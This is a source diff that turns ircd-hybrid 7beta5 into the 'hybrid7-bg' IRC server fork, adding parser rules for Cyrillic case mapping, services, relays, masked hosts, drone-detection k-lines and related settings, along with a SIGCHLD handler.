diff -uNrd ircd-hybrid-7beta5/src/ircd_parser.y hybrid7-bg/src/ircd_parser.y
--- ircd-hybrid-7beta5/src/ircd_parser.y	Mon May  7 11:50:32 2001
+++ hybrid7-bg/src/ircd_parser.y	Fri Jul 19 00:23:19 2002
@@ -18,7 +18,7 @@
  *   along with this program; if not, write to the Free Software
  *   Foundation, Inc., 675 Mass Ave, Cambridge, MA 02139, USA.
  *
- * $Id: ircd_parser.y,v 1.166 2001/05/07 15:50:32 toot Exp $
+ * $Id: ircd_parser.y,v 1.20 2002/07/19 04:23:19 Administrator Exp $
  */
 
 %{
@@ -103,6 +103,8 @@
 %token  COMPRESSED
 %token  CONNECT
 %token  CONNECTFREQ
+%token  CYRILLIC
+%token  TOTALTRANS
 %token  DEFAULT_FLOODCOUNT
 %token  DENY
 %token  DESCRIPTION
@@ -116,6 +118,7 @@
 %token  FNAME_USERLOG
 %token  FNAME_OPERLOG
 %token  FNAME_FOPERLOG
+%token  NETID
 %token  GECOS
 %token  GLINE
 %token  GLINES
@@ -125,6 +128,8 @@
 %token  GLOBAL_KILL
 %token  HAVE_IDENT
 %token  HOST
+%token  MASKHOST
+%token  SKIP_ON_FAIL
 %token  HUB
 %token  HUB_MASK
 %token  IDLETIME
@@ -171,6 +176,7 @@
 %token  SENDQ
 %token  SEND_PASSWORD
 %token  SERVERINFO
+%token  SERVICES
 %token  SHARED
 %token  SPOOF
 %token  SPOOF_NOTICE
@@ -225,6 +231,7 @@
 %token  T_SKILL
 %token  T_LOCOPS
 %token  T_NCHANGE
+%token	T_REMOTE
 %token  T_REJ
 %token  T_UNAUTH
 %token  T_SPY
@@ -240,12 +247,30 @@
 %token  MAX_TARGETS
 %token  T_MAX_CLIENTS
 %token  LINKS_DELAY
+%token	GRACE_TIME
 %token  VCHANS_OPER_ONLY
 %token  MIN_NONWILDCARD
 %token  DISABLE_VCHANS
 %token  SECONDS MINUTES HOURS DAYS WEEKS MONTHS YEARS DECADES CENTURIES MILLENNIA
 %token  BYTES KBYTES MBYTES GBYTES TBYTES
 
+%token  EQUIVALENT
+%token  NICKS
+%token  RELAYS
+%token	USERPAR
+%token	PARAM
+%token  DUMMY
+
+%token	DRONE_RATE_MAX
+%token	DRONE_RATE_PERIOD
+%token	DRONE_KLINE
+%token	DRONE_BATCH
+%token	DRONE_KLINE_TIME
+%token	DREASON
+%token	SPAM_WAIT
+%token	REPEAT_GRACE
+%token	SPAWN_PASS
+
 %left '-' '+'
 %left '*' '/'
 %left NEG
@@ -270,13 +295,17 @@
                 | serverinfo_entry
                 | quarantine_entry
                 | shared_entry
+                | services_entry
                 | connect_entry
                 | kill_entry
                 | deny_entry
-		| exempt_entry
-		| general_entry
+				| exempt_entry
+				| general_entry
                 | gecos_entry
                 | modules_entry
+                | equivalent_entry
+                | relays_entry
+                | userpar_entry
                 | error ';'
                 | error '}'
         ;
@@ -398,13 +427,13 @@
 
 modules_entry:          MODULES
   '{' modules_items '}' ';'
-
+;
 modules_items:   modules_items modules_item |
                     modules_item
-
+;
 modules_item:    modules_module | modules_path |
                  error
-
+;
 modules_module:  MODULE '=' QSTRING ';'
 {
 #ifndef STATIC_MODULES /* NOOP in the static case */
@@ -437,17 +466,17 @@
 
 serverinfo_entry:       SERVERINFO
   '{' serverinfo_items '}' ';'
-
+;
 serverinfo_items:       serverinfo_items serverinfo_item |
                         serverinfo_item 
-
+;
 serverinfo_item:        serverinfo_name | serverinfo_vhost |
                         serverinfo_hub | serverinfo_description |
                         serverinfo_network_name | serverinfo_network_desc |
                         serverinfo_max_clients | serverinfo_no_hack_ops |
                         serverinfo_rsa_private_key |
 			error
-
+;
 serverinfo_rsa_private_key: RSA_PRIVATE_KEY '=' QSTRING ';'
   {
 #ifdef OPENSSL
@@ -486,7 +515,7 @@
       "Ignoring config file entry rsa_private_key -- no OpenSSL support");
 #endif
   }
-
+;
 serverinfo_no_hack_ops: NO_HACK_OPS '=' TYES ';'
   {
     ServerInfo.no_hack_ops = 1;
@@ -579,13 +608,13 @@
  ***************************************************************************/
 
 admin_entry: ADMIN  '{' admin_items '}' ';' 
-
+;
 admin_items:    admin_items admin_item |
                 admin_item
-
+;
 admin_item:     admin_name | admin_description |
                 admin_email | error
-
+;
 admin_name:     NAME '=' QSTRING ';' 
   {
     MyFree(AdminInfo.name);
@@ -609,14 +638,14 @@
  ***************************************************************************/
 
 logging_entry:          LOGGING  '{' logging_items '}' ';' 
-
+;
 logging_items:          logging_items logging_item |
                         logging_item 
-
+;
 logging_item:           logging_path | logging_oper_log |
                         logging_gline_log | logging_log_level |
 			error
-
+;
 logging_path:           T_LOGPATH '=' QSTRING ';' 
                         {
                         };
@@ -711,12 +740,12 @@
 
 oper_items:     oper_items oper_item |
                 oper_item
-
+;
 oper_item:      oper_name  | oper_user | oper_password |
                 oper_class | oper_global_kill | oper_remote |
                 oper_kline | oper_unkline | oper_gline | oper_nick_changes |
                 oper_die | oper_rehash | oper_admin | error
-
+;
 oper_name:      NAME '=' QSTRING ';'
   {
     MyFree(yy_achead->name);
@@ -835,7 +864,7 @@
 
 class_items:    class_items class_item |
                 class_item
-
+;
 class_item:     class_name |
                 class_ping_time |
                 class_number_per_ip |
@@ -843,7 +872,7 @@
                 class_max_number |
                 class_sendq |
 		error
-
+;
 class_name:     NAME '=' QSTRING ';' 
   {
     MyFree(class_name_var);
@@ -875,6 +904,81 @@
     class_sendq_var = $3;
   };
 
+/***************************************************************************
+ *  section equivalent, defines equivalent nicks          -demond
+ ***************************************************************************/
+
+equivalent_entry:   EQUIVALENT
+  {
+  }
+  '{' equivalent_items '}' ';'
+  {
+  };
+
+equivalent_items:   equivalent_items equivalent_item |
+                    equivalent_item
+;
+equivalent_item:    equivalent_nicks | equivalent_dummy | error
+;
+equivalent_nicks:   NICKS '=' QSTRING ';'
+  {
+    add_equiv_nicks(yylval.string);
+  };
+
+equivalent_dummy:   DUMMY '=' expr ';'
+  {
+  };
+
+/***************************************************************************
+ *  section relays, defines relay pseudo servers          -demond
+ ***************************************************************************/
+
+relays_entry:       RELAYS
+  {
+  }
+  '{' relays_items '}' ';'
+  {
+  };
+
+relays_items:       relays_items relays_item |
+                    relays_item
+;
+relays_item:        relay_server | relay_dummy | error
+;
+relay_server:       NAME '=' QSTRING ';'
+  {
+    add_relay_server(yylval.string);
+  };
+
+relay_dummy:        DUMMY '=' expr ';'
+  {
+  };
+
+/***************************************************************************
+ *  section userpar, defines USER constant parameters 
+ *  by various clients, mostly Java applets                    -demond
+ ***************************************************************************/
+
+userpar_entry:      USERPAR
+  {
+  }
+  '{' userpar_items '}' ';'
+  {
+  };
+
+userpar_items:      userpar_items userpar_item |
+                    userpar_item
+;
+userpar_item:       userpar_param | userpar_dummy | error
+;
+userpar_param:      PARAM '=' QSTRING ';'
+  {
+    add_userpar_param(yylval.string);
+  };
+
+userpar_dummy:      DUMMY '=' expr ';'
+  {
+  };
 
 /***************************************************************************
  *  section listen
@@ -892,9 +996,9 @@
 
 listen_items:   listen_items listen_item |
                 listen_item
-
+;
 listen_item:    listen_port | listen_address | listen_host | error
-
+;
 listen_port:    PORT '=' expr ';'
   {
     add_listener($3, listener_address);
@@ -986,14 +1090,14 @@
 
 auth_items:     auth_items auth_item |
                 auth_item
-
+;
 auth_item:      auth_user | auth_passwd | auth_class |
                 auth_kline_exempt | auth_have_ident | auth_is_restricted |
                 auth_exceed_limit | auth_no_tilde | auth_gline_exempt |
                 auth_spoof | auth_spoof_notice |
                 auth_redir_serv | auth_redir_port | auth_persistant |
-                error
-
+                auth_maskhost | auth_skipfail | error
+;
 auth_user:   USER '=' QSTRING ';'
   {
     char *p;
@@ -1147,6 +1251,24 @@
    yy_achead->flags &= CONF_FLAGS_PERSISTANT;
   };
 
+auth_maskhost: MASKHOST '=' TYES ';'
+  {
+   yy_achead->flags |= CONF_FLAGS_MASKHOST;
+  }
+  |            MASKHOST '=' TNO ';'
+  {
+   yy_achead->flags &= CONF_FLAGS_MASKHOST;
+  };
+
+auth_skipfail: SKIP_ON_FAIL '=' TYES ';'
+  {
+   yy_achead->flags |= CONF_FLAGS_SKIPFAIL;
+  }
+  |            SKIP_ON_FAIL '=' TNO ';'
+  {
+   yy_achead->flags &= CONF_FLAGS_SKIPFAIL;
+  };
+
 /***************************************************************************
  *  section quarantine
  ***************************************************************************/
@@ -1169,9 +1291,9 @@
 
 quarantine_items:       quarantine_items quarantine_item |
 			quarantine_item
-
+;
 quarantine_item:        quarantine_name | quarantine_reason | error
-
+;
 quarantine_name:        NAME '=' QSTRING ';'
   {
     MyFree(yy_aconf->name);
@@ -1209,9 +1331,9 @@
 
 shared_items:		shared_items shared_item |
 			shared_item
-
+;
 shared_item:		shared_name | shared_user | shared_host | error
-
+;
 shared_name:		NAME '=' QSTRING ';'
   {
     MyFree(yy_aconf->name);
@@ -1231,6 +1353,53 @@
   };
 
 /***************************************************************************
+ *  section services, for defining which servers
+ *  are to be treated specially (as services)       -demond 
+ ***************************************************************************/
+
+services_entry:		SERVICES
+  {
+    if(yy_aconf != NULL)
+      {
+        free_conf(yy_aconf);
+        yy_aconf = NULL;
+      }
+    yy_aconf=make_conf();
+    yy_aconf->status = CONF_ZLINE;
+    yy_aconf->name = NULL;
+    yy_aconf->user = NULL;
+    yy_aconf->host = NULL;
+  }
+  '{' services_items '}' ';'
+  {
+    conf_add_z_conf(yy_aconf);
+    yy_aconf = (struct ConfItem *)NULL;
+  };
+
+services_items:		services_items services_item |
+			services_item
+;
+services_item:		services_name | services_user | services_host | error
+;
+services_name:		NAME '=' QSTRING ';'
+  {
+    MyFree(yy_aconf->name);
+    DupString(yy_aconf->name, yylval.string);
+  };
+
+services_user:		USER '=' QSTRING ';'
+  {
+    MyFree(yy_aconf->user);
+    DupString(yy_aconf->user, yylval.string);
+  };
+
+services_host:		HOST '=' QSTRING ';'
+  {
+    MyFree(yy_aconf->host);
+    DupString(yy_aconf->host, yylval.string);
+  };
+
+/***************************************************************************
  *  section connect
  ***************************************************************************/
 
@@ -1343,7 +1512,7 @@
 
 connect_items:  connect_items connect_item |
                 connect_item
-
+;
 connect_item:   connect_name | connect_host | connect_send_password |
                 connect_accept_password | connect_port | connect_aftype | 
  		connect_fakename | connect_lazylink | connect_hub_mask | 
@@ -1351,7 +1520,7 @@
 		connect_encrypted | connect_compressed | connect_cryptlink |
 		connect_pubkey |
                 error
-
+;
 connect_name:   NAME '=' QSTRING ';'
   {
     if(yy_aconf->name != NULL)
@@ -1593,9 +1762,9 @@
 
 kill_items:     kill_items kill_item |
                 kill_item
-
+;
 kill_item:      kill_user | kill_reason | error
-
+;
 
 kill_user:      USER '=' QSTRING ';'
   {
@@ -1661,9 +1830,9 @@
 
 deny_items:     deny_items deny_item |
                 deny_item
-
+;
 deny_item:      deny_ip | deny_reason | error
-
+;
 
 deny_ip:        IP '=' QSTRING ';'
   {
@@ -1707,9 +1876,9 @@
 
 exempt_items:     exempt_items exempt_item |
                 exempt_item
-
+;
 exempt_item:      exempt_ip | error
-
+;
 exempt_ip:        IP '=' QSTRING ';'
   {
     char *p;
@@ -1750,9 +1919,9 @@
 
 gecos_items:     gecos_items gecos_item |
                  gecos_item
-
+;
 gecos_item:      gecos_name | gecos_reason | gecos_action | error
-
+;
 
 gecos_name:    NAME '=' QSTRING ';' 
   {
@@ -1787,15 +1956,16 @@
 
 general_entry:      GENERAL
   '{' general_items '}' ';'
-
+;
 general_items:      general_items general_item |
                     general_item
-
+;
 general_item:       general_failed_oper_notice |
                     general_anti_nick_flood | general_max_nick_time |
                     general_max_nick_changes | general_max_accept |
                     general_anti_spam_exit_message_time |
                     general_ts_warn_delta | general_ts_max_delta |
+					general_grace_time | general_spam_wait |
                     general_kline_with_reason |
                     general_kline_with_connection_closed |
                     general_warn_no_nline |
@@ -1808,17 +1978,41 @@
                     general_iauth_server |
                     general_iauth_port |
                     general_glines | general_gline_time |
-                    general_idletime |
+                    general_idletime | general_spawn_pass |
                     general_hide_server | general_maximum_links |
                     general_message_locale | general_client_exit |
                     general_fname_userlog | general_fname_operlog |
                     general_fname_foperlog | general_oper_only_umodes |
-                    general_max_targets |
+                    general_max_targets | general_repeat_grace |
                     general_links_delay | general_oper_umodes |
                     general_vchans_oper_only | general_disable_vchans |
                     general_caller_id_wait | general_default_floodcount |
                     general_persistant_expire_time | general_min_nonwildcard |
+                    general_netid | general_cyrillic | general_totaltrans |
+					general_drate_max | general_drate_period |
+					general_drone_kline | general_drone_batch |
+					general_drone_ktime | general_drone_reason |
                     error
+;
+general_cyrillic: CYRILLIC '=' TNO ';'
+  {
+    ConfigFileEntry.cyrillic = 0;
+  }
+    |
+    CYRILLIC '=' TYES ';'
+  {
+    ConfigFileEntry.cyrillic = 1;
+  } ;  
+
+general_totaltrans: TOTALTRANS '=' TNO ';'
+  {
+    ConfigFileEntry.totaltrans = 0;
+  }
+    |
+    TOTALTRANS '=' TYES ';'
+  {
+    ConfigFileEntry.totaltrans = 1;
+  } ;  
 
 general_failed_oper_notice:   FAILED_OPER_NOTICE '=' TYES ';'
   {
@@ -1874,6 +2068,57 @@
   {
     ConfigFileEntry.links_delay = $3;
   } ;
+
+general_grace_time:    GRACE_TIME '=' timespec ';'
+  {
+    ConfigFileEntry.grace_time = $3;
+  } ;
+
+general_spam_wait:     SPAM_WAIT '=' timespec ';'
+  {
+    ConfigFileEntry.spam_wait = $3;
+  } ;
+
+general_repeat_grace:  REPEAT_GRACE '=' timespec ';'
+  {
+    ConfigFileEntry.repeat_grace = $3;
+  } ;
+
+general_drate_max:     DRONE_RATE_MAX '=' expr ';'
+  {
+    ConfigFileEntry.drone_rate_max = $3;
+  } ;
+
+general_drate_period:  DRONE_RATE_PERIOD '=' timespec ';'
+  {
+    ConfigFileEntry.drone_rate_period = $3;
+  } ;
+
+general_drone_ktime:   DRONE_KLINE_TIME '=' timespec ';'
+  {
+    ConfigFileEntry.drone_kline_time = $3;
+  } ;
+
+general_drone_kline:   DRONE_KLINE '=' TYES ';'
+  {
+    ConfigFileEntry.drone_kline = 1;
+  }
+    |
+    DRONE_KLINE '=' TNO ';'
+  {
+    ConfigFileEntry.drone_kline = 0;
+  } ;
+
+general_drone_batch:   DRONE_BATCH '=' TYES ';'
+  {
+    ConfigFileEntry.drone_batch = 1;
+  }
+    |
+    DRONE_BATCH '=' TNO ';'
+  {
+    ConfigFileEntry.drone_batch = 0;
+  } ;
+
 general_kline_with_reason: KLINE_WITH_REASON '=' TYES ';'
   {
     ConfigFileEntry.kline_with_reason = 1;
@@ -2016,6 +2261,24 @@
 	      MAXPATHLEN-1)[MAXPATHLEN-1] = 0;
 };
 
+general_netid: NETID '=' QSTRING ';'
+{
+  strncpy_irc(ConfigFileEntry.netid, yylval.string,
+	      MAXNETID)[MAXNETID] = 0;
+};
+
+general_spawn_pass: SPAWN_PASS '=' QSTRING ';'
+{
+  strncpy_irc(ConfigFileEntry.spawn_pass, yylval.string,
+	      PASSWDLEN)[PASSWDLEN] = 0;
+};
+
+general_drone_reason: DREASON '=' QSTRING ';'
+{
+  strncpy_irc(ConfigFileEntry.drone_reason, yylval.string,
+	      MAXDREASON)[MAXDREASON] = 0;
+};
+
 general_glines: GLINES '=' TYES ';'
   {
     ConfigFileEntry.glines = 1;
@@ -2078,7 +2341,7 @@
 
 umode_oitems:    umode_oitems ',' umode_oitem |
   umode_oitem
-
+;
 umode_oitem:     T_BOTS
   {
     ConfigFileEntry.oper_umodes |= FLAGS_BOTS;
@@ -2103,6 +2366,10 @@
   {
     ConfigFileEntry.oper_umodes |= FLAGS_NCHANGE;
   }
+              | T_REMOTE
+  {
+    ConfigFileEntry.oper_umodes |= FLAGS_REMOTE;
+  }
               | T_REJ
   {
     ConfigFileEntry.oper_umodes |= FLAGS_REJ;
@@ -2156,7 +2423,7 @@
 
 umode_items:	umode_items ',' umode_item |
   umode_item 
-
+;
 umode_item:	T_BOTS 
   {
     ConfigFileEntry.oper_only_umodes |= FLAGS_BOTS;
@@ -2180,6 +2447,10 @@
               | T_NCHANGE
   {
     ConfigFileEntry.oper_only_umodes |= FLAGS_NCHANGE;
+  }
+              | T_REMOTE
+  {
+    ConfigFileEntry.oper_only_umodes |= FLAGS_REMOTE;
   }
               | T_REJ
   {
diff -uNrd ircd-hybrid-7beta5/src/ircd_signal.c hybrid7-bg/src/ircd_signal.c
--- ircd-hybrid-7beta5/src/ircd_signal.c	Thu Jan 18 04:07:39 2001
+++ hybrid7-bg/src/ircd_signal.c	Tue Jul 23 01:20:24 2002
@@ -17,7 +17,7 @@
  *   along with this program; if not, write to the Free Software
  *   Foundation, Inc., 675 Mass Ave, Cambridge, MA 02139, USA.
  *
- * $Id: ircd_signal.c,v 7.5 2001/01/18 09:07:39 ejb Exp $
+ * $Id: ircd_signal.c,v 1.2 2002/07/23 05:20:24 Administrator Exp $
  */
 
 #include <signal.h>
@@ -73,6 +73,13 @@
   }
 }
 
+static void sigchld_handler(int sig)
+{
+	int status;
+
+	(void)wait(&status);
+}
+
 /*
  * setup_signals - initialize signal handlers for server
  */
@@ -107,6 +114,10 @@
   act.sa_handler = sigterm_handler;
   sigaddset(&act.sa_mask, SIGTERM);
   sigaction(SIGTERM, &act, 0);
+
+  act.sa_handler = sigchld_handler;
+  sigaddset(&act.sa_mask, SIGCHLD);
+  sigaction(SIGCHLD, &act, 0);
 }
 
 
diff -uNrd ircd-hybrid-7beta5/src/ircdauth.c hybrid7-bg/src/ircdauth.c
--- ircd-hybrid-7beta5/src/ircdauth.c	Mon Jan 22 19:42:46 2001
+++ hybrid7-bg/src/ircdauth.c	Tue Jun  5 12:35:46 2001
@@ -17,7 +17,7 @@
  *   along with this program; if not, write to the Free Software
  *   Foundation, Inc., 675 Mass Ave, Cambridge, MA 02139, USA.
  *
- *   $Id: ircdauth.c,v 7.35 2001/01/23 00:42:46 ejb Exp $
+ *   $Id: ircdauth.c,v 1.1.1.1 2001/06/05 16:35:46 demond Exp $
  */
 
 #include <stdio.h>
diff -uNrd ircd-hybrid-7beta5/src/linebuf.c hybrid7-bg/src/linebuf.c
--- ircd-hybrid-7beta5/src/linebuf.c	Wed May  2 03:17:05 2001
+++ hybrid7-bg/src/linebuf.c	Tue Jun  5 12:35:46 2001
@@ -6,7 +6,7 @@
  * The idea here is that we should really be maintaining pre-munged
  * buffer "lines" which we can later refcount to save needless copies.
  *
- * $Id: linebuf.c,v 7.31 2001/05/02 07:17:05 a1kmm Exp $
+ * $Id: linebuf.c,v 1.1.1.1 2001/06/05 16:35:46 demond Exp $
  */
 
 #include <errno.h>
diff -uNrd ircd-hybrid-7beta5/src/list.c hybrid7-bg/src/list.c
--- ircd-hybrid-7beta5/src/list.c	Thu May 10 02:30:44 2001
+++ hybrid7-bg/src/list.c	Tue Jun  5 12:35:46 2001
@@ -19,7 +19,7 @@
  *
  *  (C) 1988 University of Oulu, Computing Center and Jarkko Oikarinen
  *
- * $Id: list.c,v 7.31 2001/05/10 06:30:44 a1kmm Exp $
+ * $Id: list.c,v 1.1.1.1 2001/06/05 16:35:46 demond Exp $
  */
 #include "tools.h"
 #include "channel.h"
diff -uNrd ircd-hybrid-7beta5/src/listener.c hybrid7-bg/src/listener.c
--- ircd-hybrid-7beta5/src/listener.c	Fri Apr 13 18:39:50 2001
+++ hybrid7-bg/src/listener.c	Tue Jun  5 12:35:46 2001
@@ -16,7 +16,7 @@
  *   along with this program; if not, write to the Free Software
  *   Foundation, Inc., 675 Mass Ave, Cambridge, MA 02139, USA.
  *
- *  $Id: listener.c,v 7.46 2001/04/13 22:39:50 davidt Exp $
+ *  $Id: listener.c,v 1.1.1.1 2001/06/05 16:35:46 demond Exp $
  */
 #include "config.h"
 #include "listener.h"
diff -uNrd ircd-hybrid-7beta5/src/m_error.c hybrid7-bg/src/m_error.c
--- ircd-hybrid-7beta5/src/m_error.c	Sun Apr  1 14:30:35 2001
+++ hybrid7-bg/src/m_error.c	Tue Jun  5 12:35:46 2001
@@ -20,7 +20,7 @@
  *   along with this program; if not, write to the Free Software
  *   Foundation, Inc., 675 Mass Ave, Cambridge, MA 02139, USA.
  *
- *   $Id: m_error.c,v 7.14 2001/04/01 18:30:35 ejb Exp $
+ *   $Id: m_error.c,v 1.1.1.1 2001/06/05 16:35:46 demond Exp $
  */
 #include "handlers.h"
 #include "client.h"
diff -uNrd ircd-hybrid-7beta5/src/match.c hybrid7-bg/src/match.c
--- ircd-hybrid-7beta5/src/match.c	Thu Jan 25 12:32:54 2001
+++ hybrid7-bg/src/match.c	Sat Feb 23 15:02:20 2002
@@ -22,7 +22,7 @@
  * Cleanup of collapse and match
  * Moved static calls variable to match
  * Added asserts for null pointers
- * $Id: match.c,v 7.12 2001/01/25 17:32:54 androsyn Exp $
+ * $Id: match.c,v 1.2 2002/02/23 20:02:20 demond Exp $
  *
  */
 #include "irc_string.h"
@@ -319,10 +319,10 @@
   0xaa, 0xab, 0xac, 0xad, 0xae, 0xaf,
   0xb0, 0xb1, 0xb2, 0xb3, 0xb4, 0xb5, 0xb6, 0xb7, 0xb8, 0xb9,
   0xba, 0xbb, 0xbc, 0xbd, 0xbe, 0xbf,
-  0xc0, 0xc1, 0xc2, 0xc3, 0xc4, 0xc5, 0xc6, 0xc7, 0xc8, 0xc9,
-  0xca, 0xcb, 0xcc, 0xcd, 0xce, 0xcf,
-  0xd0, 0xd1, 0xd2, 0xd3, 0xd4, 0xd5, 0xd6, 0xd7, 0xd8, 0xd9,
-  0xda, 0xdb, 0xdc, 0xdd, 0xde, 0xdf,
+  0xe0, 0xe1, 0xe2, 0xe3, 0xe4, 0xe5, 0xe6, 0xe7, 0xe8, 0xe9,
+  0xea, 0xeb, 0xec, 0xed, 0xee, 0xef,
+  0xf0, 0xf1, 0xf2, 0xf3, 0xf4, 0xf5, 0xf6, 0xf7, 0xf8, 0xf9,
+  0xfa, 0xfb, 0xfc, 0xfd, 0xfe, 0xff,
   0xe0, 0xe1, 0xe2, 0xe3, 0xe4, 0xe5, 0xe6, 0xe7, 0xe8, 0xe9,
   0xea, 0xeb, 0xec, 0xed, 0xee, 0xef,
   0xf0, 0xf1, 0xf2, 0xf3, 0xf4, 0xf5, 0xf6, 0xf7, 0xf8, 0xf9,
@@ -358,10 +358,10 @@
   0xca, 0xcb, 0xcc, 0xcd, 0xce, 0xcf,
   0xd0, 0xd1, 0xd2, 0xd3, 0xd4, 0xd5, 0xd6, 0xd7, 0xd8, 0xd9,
   0xda, 0xdb, 0xdc, 0xdd, 0xde, 0xdf,
-  0xe0, 0xe1, 0xe2, 0xe3, 0xe4, 0xe5, 0xe6, 0xe7, 0xe8, 0xe9,
-  0xea, 0xeb, 0xec, 0xed, 0xee, 0xef,
-  0xf0, 0xf1, 0xf2, 0xf3, 0xf4, 0xf5, 0xf6, 0xf7, 0xf8, 0xf9,
-  0xfa, 0xfb, 0xfc, 0xfd, 0xfe, 0xff 
+  0xc0, 0xc1, 0xc2, 0xc3, 0xc4, 0xc5, 0xc6, 0xc7, 0xc8, 0xc9,
+  0xca, 0xcb, 0xcc, 0xcd, 0xce, 0xcf,
+  0xd0, 0xd1, 0xd2, 0xd3, 0xd4, 0xd5, 0xd6, 0xd7, 0xd8, 0xd9,
+  0xda, 0xdb, 0xdc, 0xdd, 0xde, 0xdf 
 };
 
 /*
diff -uNrd ircd-hybrid-7beta5/src/memory.c hybrid7-bg/src/memory.c
--- ircd-hybrid-7beta5/src/memory.c	Thu May 10 02:30:45 2001
+++ hybrid7-bg/src/memory.c	Tue Jun  5 12:35:46 2001
@@ -17,7 +17,7 @@
  *   along with this program; if not, write to the Free Software
  *   Foundation, Inc., 675 Mass Ave, Cambridge, MA 02139, USA.
  *
- * $Id: memory.c,v 7.18 2001/05/10 06:30:45 a1kmm Exp $
+ * $Id: memory.c,v 1.1.1.1 2001/06/05 16:35:46 demond Exp $
  */
 #include <stdlib.h>
 #include <string.h>
